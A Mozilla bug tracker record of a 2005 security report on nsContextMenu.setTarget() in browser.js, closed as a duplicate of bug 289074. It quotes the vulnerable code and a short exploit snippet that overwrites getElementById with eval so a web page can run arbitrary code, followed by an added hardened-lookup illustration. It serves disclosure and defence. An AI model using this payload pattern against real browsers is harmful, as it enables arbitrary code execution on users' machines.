Bug 289078 (Closed): security hole in nsContextMenu.setTarget()
Opened 20 years ago
Closed 20 years ago
Categories: Core :: Security, defect
Status: RESOLVED DUPLICATE of bug 289074
People: Reporter: moz_bug_r_a4, Assigned: dveditz
Whiteboard: [sg:dupe 289074]
Attachments: 1 file (text/html, deleted)
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Build Identifier: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Vulnerability: arbitrary code execution
Vulnerable code:
from nsContextMenu.prototype.setTarget() in browser.js
```javascript
if ( this.target.nodeType == Node.ELEMENT_NODE ) {
  if ( this.target.localName.toUpperCase() == "IMG" ) {
    this.onImage = true;
    this.imageURL = this.target.src;
    // Look for image map.
    var mapName = this.target.getAttribute( "usemap" );
    if ( mapName ) {
      // Find map.
      var map = this.target.ownerDocument.getElementById( mapName.substr(1) );
```
Exploit:
Web pages can overwrite the getAttribute and getElementById methods, as in
the following.
```javascript
document.images[0].getAttribute = function() {
  return { substr : function() { return MALICIOUS_CODE; } };
};
document.getElementById = eval;
```
I have confirmed that the following testcase works in:
[Firefox]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050317
Firefox/1.0.2
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Firefox/1.0.3
[Mozilla Suite]
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050319
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.7) Gecko/20050404
Reproducible: Always
Steps to Reproduce:
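The defensive side of the pattern the report describes, as an added illustration that is not Firefox's code or its eventual fix: a minimal stand-in DOM (FakeElement and FakeDocument are assumed here) in which a page shadows getAttribute and getElementById, placed next to a lookup that invokes the prototype originals captured at startup and validates the usemap value before using it, so the shadowed properties are never reached. The stand-in for eval only records the string it is handed.

```javascript
// Added illustration (not Firefox code): minimal stand-ins for the DOM
// objects involved, so the chrome-side lookup can be run outside a browser.
class FakeElement {
  constructor(localName, attrs) { this.localName = localName; this.attrs = attrs; }
  getAttribute(name) { return this.attrs[name] ?? null; }
}
class FakeDocument {
  constructor() { this.byId = new Map(); }
  getElementById(id) { return this.byId.get(id) ?? null; }
}
// Capture the originals once, before any content script runs, so the
// hardened path never dispatches through a property the page can shadow.
const realGetAttribute = FakeElement.prototype.getAttribute;
const realGetElementById = FakeDocument.prototype.getElementById;

// Mirrors the vulnerable setTarget() logic: every call goes through
// properties the page controls.
function findMapNaive(doc, target) {
  const mapName = target.getAttribute("usemap");
  if (mapName) return doc.getElementById(mapName.substr(1));
  return null;
}

// Hardened: call the prototype originals explicitly and check the
// attribute value's type and shape before using it as a lookup key.
function findMapHardened(doc, target) {
  const mapName = Reflect.apply(realGetAttribute, target, ["usemap"]);
  if (typeof mapName !== "string" || !mapName.startsWith("#")) return null;
  return Reflect.apply(realGetElementById, doc, [mapName.slice(1)]);
}

// Constructed scenario: a page that has shadowed both methods in the shape
// the report describes. The eval stand-in records what it was fed.
function scenario() {
  const doc = new FakeDocument();
  const map = new FakeElement("map", { name: "m" });
  doc.byId.set("m", map);
  const img = new FakeElement("img", { usemap: "#m" });
  const fed = [];
  img.getAttribute = () => ({ substr: () => "PAYLOAD" });
  doc.getElementById = (s) => { fed.push(s); return null; };
  const naive = findMapNaive(doc, img);       // reaches the shadowed methods
  const hardened = findMapHardened(doc, img); // returns the real map element
  return { naive, hardened, fed, map };
}
```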
Reporter, Comment 1 • 20 years ago
Updated • 20 years ago
Status: UNCONFIRMED → NEW
Ever confirmed: true
Updated•20 years ago
Flags: blocking1.7.7?
Flags: blocking-aviary1.0.3?
Comment 2•20 years ago
Note that the testcase doesn't seem to exploit on trunk gecko.
Comment 3•20 years ago
Same eval problem as reported in bug 289074.
*** This bug has been marked as a duplicate of 289074 ***
Status: NEW → RESOLVED
Closed: 20 years ago
Resolution: --- → DUPLICATE
Assignee, Updated • 20 years ago
Whiteboard: [sg:dupe 289074]
Updated•20 years ago
Flags: blocking1.7.7?
Flags: blocking-aviary1.0.3?
Assignee, Updated • 20 years ago
Group: security